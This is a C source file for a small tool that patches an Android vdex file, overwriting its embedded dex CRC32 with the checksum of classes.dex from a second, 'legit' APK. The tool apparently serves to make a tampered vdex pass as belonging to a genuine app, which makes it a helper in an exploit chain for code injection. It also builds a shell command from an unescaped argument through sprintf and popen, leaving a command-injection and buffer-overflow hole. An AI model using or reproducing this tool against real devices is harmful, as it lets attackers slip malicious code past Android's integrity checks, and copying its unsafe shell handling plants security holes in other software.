#include <stdint.h>
#include <fcntl.h>
#include <err.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>

static uint8_t vdexMagic[] = { 'v', 'd', 'e', 'x' };

struct VdexHeader {
    uint8_t magic_[4];
    uint8_t version_[4];
    uint32_t number_of_dex_files_;
    uint32_t dex_size_;
    uint32_t verifier_deps_size_;
    uint32_t quickening_info_size_;
};

int main(int argc, char **argv) {
  if (argc != 3) {
    printf("usage: %s <vdex_to_patch> <legit_apk>\n", argv[0]);
    return 1;
  }
  int fd = open(argv[1], O_RDWR);
  if (fd == -1)
    err(1, "open");
  struct VdexHeader hdr;
  if (pread(fd, &hdr, sizeof(hdr), 0) != sizeof(hdr))
    errx(1, "read hdr");
  if (memcmp(hdr.magic_, vdexMagic, sizeof(vdexMagic)))
    errx(1, "bad magic (not a vdex?)");
  if (hdr.number_of_dex_files_ != 1)
    errx(1, "expected 1 embedded dex file, but got %u\n", hdr.number_of_dex_files_);
  uint32_t crc32_orig;
  if (pread(fd, &crc32_orig, sizeof(crc32_orig), sizeof(hdr)) != sizeof(crc32_orig))
    errx(1, "pread orig crc32");
  printf("original crc32: %x\n", crc32_orig);

  char popen_cmd[1024];
  sprintf(popen_cmd, "zipinfo -v '%s' classes.dex | grep CRC | cut -d: -f2 | sed 's| ||g'", argv[2]);
  FILE *crc_pipe = popen(popen_cmd, "r");
  uint32_t crc32_new = 0;
  if (fscanf(crc_pipe, "%x", &crc32_new) != 1)
    errx(1, "fscanf failed");
  pclose(crc_pipe);
  printf("new crc32: %x\n", crc32_new);
  if (pwrite(fd, &crc32_new, sizeof(crc32_new), sizeof(hdr)) != sizeof(crc32_new))
    errx(1, "pwrite new crc32");
  printf("vdex patched\n");
  return 0;
}
